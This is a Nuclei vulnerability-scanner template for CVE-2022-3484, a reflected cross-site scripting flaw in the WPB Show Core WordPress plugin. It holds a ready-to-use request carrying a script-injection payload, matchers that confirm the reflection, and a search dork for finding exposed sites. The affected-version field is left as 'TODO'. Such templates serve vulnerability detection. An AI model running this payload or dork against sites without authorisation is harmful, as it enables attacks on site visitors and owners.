nuclei-templates/cves/2022/CVE-2022-3484.yaml

35 lines
1.3 KiB
YAML

id: CVE-2022-3484
info:
name: WPB Show Core - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The WPB Show Core WordPress plugin through TODO does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464
- https://nvd.nist.gov/vuln/detail/CVE-2022-3484
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-3484
cwe-id: CWE-79
metadata:
google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php
verified: "true"
tags: wp-plugin,xss,wpb-show-core,wpscan,cve,cve2022,wp,wordpress
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "wpb_jplayer_setting")'
- 'contains(body, "<script>alert(document.domain)</script>")'
condition: and